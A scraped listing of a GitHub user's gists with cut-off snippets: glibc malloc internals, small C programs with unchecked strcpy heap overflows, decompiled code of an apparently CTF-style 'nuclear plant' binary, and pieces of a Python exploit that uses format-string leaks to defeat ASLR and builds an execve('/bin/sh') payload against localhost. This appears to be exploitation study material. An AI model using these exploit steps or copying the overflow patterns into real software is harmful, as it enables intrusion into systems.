Mathy Vanhoef vanhoefm
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /*notvuln.c*/ | |
| int main(int argc, char **argv[]) { | |
| char *buf; | |
| buf = (char*)malloc(1024); | |
| printf("buf=%p", buf); | |
| strcpy(buf, argv[1]); | |
| free(buf); | |
| } |
vanhoefm
/ malloc\malloc.c
Last active
December 12, 2015 02:59
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* Take a chunk off a bin list */ | |
| void unlink(malloc_chunk *P, malloc_chunk *BK, malloc_chunk *FD) | |
| { | |
| FD = P->fd; | |
| BK = P->bk; | |
| if (__builtin_expect (FD->bk != P || BK->fd != P, 0)) | |
| malloc_printerr(check_action,"corrupted double-linked list",P); | |
| else { | |
| FD->bk = BK; | |
| BK->fd = FD; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdio.h> | |
| #include <string.h> | |
| #include <stdlib.h> | |
| int main(int argc, char *argv[]) | |
| { | |
| char *buf1, *buf2, *buf3; | |
| if (argc != 4) return; | |
| buf1 = malloc(256); |
vanhoefm
/ malloc\malloc.c
Last active
December 12, 2015 06:59
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| static void* _int_malloc(mstate av, size_t bytes) | |
| { | |
| INTERNAL_SIZE_T nb; /* normalized request size */ | |
| mchunkptr victim; /* inspected/selected chunk */ | |
| INTERNAL_SIZE_T size; /* its size */ | |
| mchunkptr remainder; /* remainder from a split */ | |
| unsigned long remainder_size; /* its size */ | |
| checked_request2size(bytes, nb); |
vanhoefm
/ gist:5072579
Last active
December 14, 2015 10:29
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| cd ~ | |
| wget http://www.kernel.org/pub/linux/kernel/projects/backports/stable/v3.9-rc4/compat-drivers-3.9-rc4-2-su.tar.bz2 | |
| tar -xvf compat-drivers-3.9-rc4-2-su.tar.bz2 | |
| cd compat-drivers-3.9-rc4-2-su | |
| wget -Ocompatdrivers_chan_qos_frag.patch http://pastie.org/pastes/7977109/download | |
| patch -p1 < compatdrivers_chan_qos_frag.patch | |
| make | |
| make install |
vanhoefm
/ gist:5281095
Last active
December 15, 2015 15:19
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| int __cdecl handle_plant_creation(int a1) | |
| { | |
| [..] | |
| plant_info = (char *)(a1 + 112 * plantid); | |
| [..] | |
| ask_for_string((int)"Insert name: ", &entered_plant_name, 0x70u); | |
| *((_WORD *)plant_info + 55) = v9; | |
| *((_WORD *)plant_info + 50) = gen_random_num(150, 500); | |
| *((_WORD *)plant_info + 51) = gen_random_num(15, 100); | |
| *((_WORD *)plant_info + 52) = gen_random_num(250, 800); |
vanhoefm
/ gist:5281979
Last active
December 15, 2015 15:29
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| int __cdecl handle_plant_creation(int a1) | |
| { | |
| puts("Creating new plant.."); | |
| plantid = *(_DWORD *)(a1 + 5600); | |
| plant_info = (char *)(a1 + 112 * plantid); | |
| memset(plant_info, 0, 112); | |
| ask_for_string((int)"Insert name: ", &entered_plant_name, 0x70u); | |
| *((_WORD *)plant_info + 55) = plantid; | |
| [..] |
vanhoefm
/ gist:5305853
Last active
December 15, 2015 18:39
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import netcatlib | |
| # Step 0 --- Connect to the target | |
| nc = netcatlib.Netcat("localhost", 4444) | |
| print "[+] Connected" | |
| # Step 1a --- Defeating ASLR with information leakage: location of stack | |
| INFOLEAK = "%10$p:ENDEBP:%11$p:ENDRET:" | |
| nc.read_until("Your choice: ") |
vanhoefm
/ gist:5305882
Last active
December 15, 2015 18:39
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Step 1c--- Get the address of execve | |
| LEAKFORKADDR = dword_to_bitstring(location_got_fork) | |
| LEAKFORKADDR += "%22$s:ENFORK:" | |
| nc.read_until("Your choice: ") | |
| nc.write("1" + "\n") | |
| nc.read_until("Insert name: ") | |
| nc.write(LEAKFORKADDR+"A"*(100-len(LEAKFORKADDR))+"\x01\x01"*4+"\xFF\xFF"+"\n") | |
| nc.read_until("Uranium in nuclear plant \"") |
vanhoefm
/ gist:5305902
Created
April 3, 2013 22:11
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Step 2 --- Payload: place the constructed stack which we will execute subsequently | |
| PAYLOAD = dword_to_bitstring(addrexecve) # address of execve | |
| PAYLOAD += "AAAA" # fake return addr | |
| PAYLOAD += dword_to_bitstring(location_payload + 20) # ptr to /bin/sh | |
| PAYLOAD += dword_to_bitstring(location_payload + 28) # ptr to argv | |
| PAYLOAD += dword_to_bitstring(location_payload + 28) # ptr to envp | |
| PAYLOAD += "/bin/sh" | |
| nc.read_until("Your choice: ") | |
| nc.write("1" + "\n") |